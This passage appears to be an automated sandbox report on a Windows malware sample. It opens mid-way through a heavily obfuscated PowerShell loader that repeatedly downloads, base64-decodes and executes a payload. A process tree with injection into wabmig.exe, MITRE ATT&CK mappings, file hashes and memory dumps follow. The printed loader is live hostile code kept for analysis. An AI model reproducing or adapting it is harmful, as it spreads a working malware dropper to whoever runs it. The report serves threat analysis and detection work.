aaheaProg,mSmrska UidetK uckiGregacKnsho]Sturt=Hoodl$ StodCBadenuAtenimUgestiTy.isnIrri oMaalsl ungu ');$Unrepressible=Ankomstperronens 'Inter$ GodkGSentiaB okklOr,hellarveaD,agem.eovii PlacdflyindEvakuaCoendgEndote SomdnSa dl6A sen. GhazDFogdeoAssorwker enCut,ilSvmmeoThun,aB findTo knF p aniLoverl Supee Ordf(Cerbe$TravlASpirodPatruj HemauBomb,nRednikSequetmelpeuSyn,nr Monos Be.e,Repro$Buni,OCont cPhylauHlqnpl PaneoPlatopWeighaOphavlPaterpSolodeBa.drbFiskerEpigra,unovlNatur)Oundy ';$Oculopalpebral=$Basicity[0];Sproglyd (Ankomstperronens 'Trskr$ UndeggunreLAdelsOStempBarbeja BygnlHyalo:IdiopEGanglxJo dsT AntaRsuaviaVari M AffiAS.mfuTHig.hRStadtIGkkebCCloveA PerfL Nonr=Bo us(NummeTK,arueRendeSotolat.enag-Pa,onpKlapsA D.ueT edichDis,n preco$GerrioCopa cKrimiuB ndelS oocoFol ePAagesAStraaLInflaPFaku.ERdgarBMesenrSpiroaSt lklSt ve) Leve ');while (!$Extramatrical) {Sproglyd (Ankomstperronens 'Netvr$MaxiegA.armlRatifoKrishbS,abea vmmlr mou:TewarLLodgiaTudsknTonetgGambitWas.euSkyklrRytteeBybos=u.com$SterstOmdelrAa skuBivoueSchaa ') ;Sproglyd $Unrepressible;Sproglyd (Ankomstperronens 'CyanoSOrthotAfs naDronnrFejlstCapia-DissiSAuskulmarg e oopse Cou,pComun o err4Panic ');Sproglyd (Ankomstperronens 'Bijob$ Refug SamolVarmeoDigekbFarmhaTex il Over:MahonE dsonxHumletmi,cor.risfaPraepmCogitaEnkeltKaerlrHv deiSolarcfreemaCobi l ede=E ito(BrudfTb.streSlbt,s unsetSpise-TroopPPetroa So stCo,coh W.ww Peltm$Over OFuppec.rskruS,illlV janoJ tunpparlaaGuberl Overp E cueSo esbS,attrGaintaD,sellCallo)Remtr ') ;Sproglyd (Ankomstperronens ' Orat$trickgFactolStr koGrav,bGamboa Ko il Pris:SengeT rundeMil bl neope T,knfcanteoEoghanAver iTrfods TotetSviensUnimp=Integ$ s mmgWm.uvlOs iao UninbAm hiaRadiolNapp :NonsmBci alePoonggAtrosrPro re gelibIkonasNedlgaDeserpUre hp Bon.aEg cerForeta kulmtagerke SpektU,fle+h ndy+Takke%Pi ke$PapyrIBaronnStjgetMarkeeDiaxorD iftn LimpaUncerlKoldtiAsterzG.ardaMegantbr,chiViolooTimotnFunktsShirt.baromc BleaoL zuluFructn,aucetFlaun ') ;$Adjunkturs=$Internalizations[$Telefonists];}$Finesserne=330114;$Rhodinol=27825;Sproglyd (Ankomstperronens 'uhygg$ BerkgSnedil dekaoKonnybTrashanaksklAutoi: .nhrIFr sonRediscChefsrCarpeeEuka a ealls kifeeKon,er syndsOe tr Melin=Koope Udfo G EpipeSwamptLemmy- AnkeCSmorgo nhalnG.ievtDenunePiac.n.rykkt Supr Under$K,lerOCitroc PateuKaardlUnsunobes jp GrnsaCrostlAest pUreomeSplenb,crolrLiniea xultlKu si ');Sproglyd (Ankomstperronens 'inter$ Milig NowalFossio ArgibShutta Laccl Pe m: Sh cSS.robkAnsg,i lopelUnl gd Tax,r Lyv.eBllebr GenseSquidsS,ild Aphel= Si k Slagt[ZaribSLinchy Bil.sUnmortCitroeVentrmMell .PrivaCIxorao mbednFravnvPassie SynorBedaat.ydro]Bynke:Utrtt:Bel,gF EdderTaffioRefunmO errBKostfa.ingbs,rmbeecla.s6Spi t4FrissSEnfout Sv,nrdothiiUnor nkrystg uda(Outbr$Me roIGlosan kibcDihydr DynaeLeg,faSenils MetaeAarsorPaafys Hens)Stirr ');Sproglyd (Ankomstperronens 'Ve,ke$UnattgOverclFunktoSlutvbSuperaBankllCanto: rdlBDigtsrho oieTelfosHyreveSquasl.ampkeIn errtoa g aga=F.act P ig[AstraSArecaySnapssSvovltHalvreUnisomOstr..FructTNewneeadvarxFor lt Ba c.Ins.aEMacronEf.ercFi keo DonkdColi iV.ndendookegDurma]Tider:Supas:T rnbA OtopSRammiCAal oI CascIugela.QuakeGFunkteWoolstStatsSUdlgstBandcrP,romiNim tnDebatgU.spi(,icni$ StafSnondekPrecoiSynchlGudsfdTelekr An eePraktr Af keKomplsFo en) Ade ');Sproglyd (Ankomstperronens ' tith$ K gegRadmalFrigeoCamoub,emesaBremsl K.iv:HeretNKoo doOblonnKultulKap ta SlutcOphjetBetraeTalesaRelaulVivacl.ngrayPlano=Roit $telemBKlvnirNe.stesaddusImagieTotallFolk,eNar arDepar.LesbisNaturuTagerbrateasUndertBehanrM sseiAkkumnBlettgdesin( B ll$ NedkFStageirejsenrepree ttens Colls.ippeeSnapsrSpewinFjordePlans, Info$SmrinRLa.hbh Uudso chiadDisesiOctaenDed,loRek yl Hafg)Regno ');Sproglyd $Nonlacteally;"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2596
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\bekendtgrelsen.Fla && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2724
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:2604

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5GODGGCRVRFN2XTPYPGA.temp

Filesize
7KB

MD5
e95e9fd30a9ea2afe437a9b55ab4e9b3

SHA1
8b7385564299000532d5377a92f8e31ecd82dc6f

SHA256
d760887b04ab2d9ece65c9a7d9ceb86b208ff7c952e09ddf877e2e06715c3757

SHA512
3640a496f87bc2194613fd096f98b4e38d96f365ea8ead6f459e3b9d0e52a474c157599d2312aa805915a9489f7b353156ce783c5a52a4830f8794ad5f9f66ca

Download Submit
C:\Users\Admin\AppData\Roaming\bekendtgrelsen.Fla

Filesize
466KB

MD5
fb3152a6134e31b49d6680b76447cef3

SHA1
2c4e7d853c947d75ba825129bf6735702f3431f9

SHA256
e1778b7bb1f62b485bde23b9d32639d5145ac644a13fb701e8627864042f96e3

SHA512
0473dc3948454a97c55f85c4353a13a9f4a5a9a4c7277d3f92426c5c7fedc6c68c0fd7a13bb23b2f36c284486312ae6e0b4439d12157704a2fe6a192269053b7

Download Submit
memory/2160-7-0x000007FEF5EA0000-0x000007FEF683D000-memory.dmp

Filesize
9.6MB

Download
memory/2160-4-0x000007FEF615E000-0x000007FEF615F000-memory.dmp

Filesize
4KB

Download
memory/2160-8-0x000007FEF5EA0000-0x000007FEF683D000-memory.dmp

Filesize
9.6MB

Download
memory/2160-9-0x000007FEF5EA0000-0x000007FEF683D000-memory.dmp

Filesize
9.6MB

Download
memory/2160-10-0x000007FEF5EA0000-0x000007FEF683D000-memory.dmp

Filesize
9.6MB

Download
memory/2160-12-0x000007FEF5EA0000-0x000007FEF683D000-memory.dmp

Filesize
9.6MB

Download
memory/2160-13-0x000007FEF615E000-0x000007FEF615F000-memory.dmp

Filesize
4KB

Download
memory/2160-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2160-5-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

Filesize
2.9MB

Download
memory/2160-48-0x000007FEF5EA0000-0x000007FEF683D000-memory.dmp

Filesize
9.6MB

Download
memory/2596-18-0x0000000006590000-0x0000000009966000-memory.dmp

Filesize
51.8MB

Download
memory/2604-19-0x0000000001C10000-0x0000000004FE6000-memory.dmp

Filesize
51.8MB

Download
memory/2604-41-0x0000000000BA0000-0x0000000001C02000-memory.dmp

Filesize
16.4MB

Download

Analysis

Sharing